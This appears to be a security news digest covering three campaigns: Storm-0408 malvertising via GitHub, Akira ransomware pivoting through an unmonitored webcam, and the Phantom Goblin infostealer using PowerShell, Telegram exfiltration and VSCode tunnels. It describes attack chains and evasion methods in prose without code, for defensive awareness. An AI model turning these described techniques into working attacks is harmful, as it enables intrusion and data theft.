Update: Microsoft Disrupts Massive Malvertising Campaign Using GitHub for Malware Distribution
Microsoft has dismantled a large-scale malvertising campaign that compromised nearly one million devices worldwide, leveraging GitHub, Dropbox, and Discord as malware distribution platforms. The attack tracked as Storm-0408, involved injecting malicious ads into illegal streaming websites, redirecting victims through multiple intermediary sites before ultimately delivering malware from attacker-controlled GitHub repositories. The first-stage payload was designed to conduct system reconnaissance, collect detailed device information, and deploy additional malware, including Lumma Stealer, Doenerium infostealer, and NetSupport RAT, which enabled remote control and credential theft. The infection chain was highly structured, with multiple redirection layers and using PowerShell, JavaScript, VBScript, and AutoIT scripts to evade detection and establish persistence. Attackers also leveraged living-off-the-land binaries and scripts (LOLBAS), including PowerShell.exe, MSBuild.exe, and RegAsm.exe, to facilitate command execution, data exfiltration, and security software bypassing. Microsoft has since removed the malicious GitHub repositories, but the campaign’s scope highlights the growing use of legitimate cloud services for malware distribution. With cybercriminals continually refining malvertising and SEO poisoning tactics, organizations should remain vigilant against threats that exploit trusted platforms for malicious activity.
Update: Akira Ransomware Exploits Unsecured Webcam to Evade EDR and Encrypt Network
The Akira ransomware gang has been observed using an unsecured webcam as an alternative attack pathway after their initial encryption attempts were blocked by Endpoint Detection and Response (EDR) software. The attackers first accessed the victim’s network through an exposed remote access solution, which can include webcams, likely exploiting stolen credentials or brute-force attacks. After infiltrating the environment, they deployed AnyDesk for remote access, moved laterally using RDP, and attempted to launch their ransomware payload. However, EDR successfully quarantined the encryptor, forcing Akira to look for less monitored devices within the network. Instead of abandoning the attack, the group scanned the network for alternative entry points and discovered a Linux-based webcam that lacked security monitoring and EDR protection. By exploiting unpatched vulnerabilities, Akira gained remote shell access to the webcam and leveraged its Linux operating system to mount Windows SMB network shares. The attackers identified a Linux-based webcam lacking security monitoring and EDR protection, which they leveraged to execute their Linux encryptor and compromise network shares. This allowed them to execute their Linux encryptor from the webcam, successfully encrypting files across the network while bypassing security defenses. The victim’s security team remained unaware of the attack, as the webcam’s unmonitored SMB traffic failed to trigger any alerts. This incident highlights the growing risk of IoT devices in ransomware attacks, as they often remain unpatched, unmonitored, and integrated into sensitive networks. Organizations must isolate IoT devices from production environments, apply regular firmware updates, and expand threat monitoring to non-traditional endpoints to prevent similar exploitation. This case also reinforces the limitations of relying solely on EDR as adversaries find creative ways to evade detection and execute ransomware attacks.
Phantom Goblin Malware Uses Social Engineering and VSCode Tunnels for Stealthy Data Theft
A newly identified malware campaign, Phantom Goblin, uses social engineering tactics to distribute information-stealing malware, leveraging deceptive techniques to gain unauthorized access to systems. The malware is delivered through spam emails containing RAR attachments, which include a malicious LNK file disguised as a PDF document. Once executed, this shortcut runs a PowerShell command that downloads additional payloads from GitHub, ensuring persistence by modifying Windows registry entries to execute at startup. The payloads, including “updater.exe,” “vscode.exe,” and “browser.exe,” are designed to appear as legitimate applications, making detection difficult. Phantom Goblin primarily targets web browsers and developer tools, stealing cookies, login credentials, and browsing history by forcefully terminating browser processes and bypassing Chrome’s App Bound Encryption (ABE) to exfiltrate sensitive data. The stolen information is then archived and transmitted to a Telegram bot using the Telegram Bot API, ensuring covert data exfiltration. A key feature of this operation is its use of Visual Studio Code (VSCode) tunnels to establish unauthorized remote access. The malware downloads and extracts a legitimate VSCode copy and then uses PowerShell scripts to create a persistent tunnel, allowing attackers to maintain access without triggering traditional security alerts. To mitigate this stealthy attack, organizations should block the execution of unexpected PowerShell scripts, restrict unauthorized VSCode tunnel creation, and monitor outbound network traffic for suspicious Telegram API activity. Deploying advanced email filtering and endpoint security with real-time behavioral analysis can help detect and prevent malicious processes before they establish persistence. As malware operations grow more sophisticated, understanding these evolving attack techniques is critical to stopping data exfiltration and unauthorized system access before they cause widespread damage.
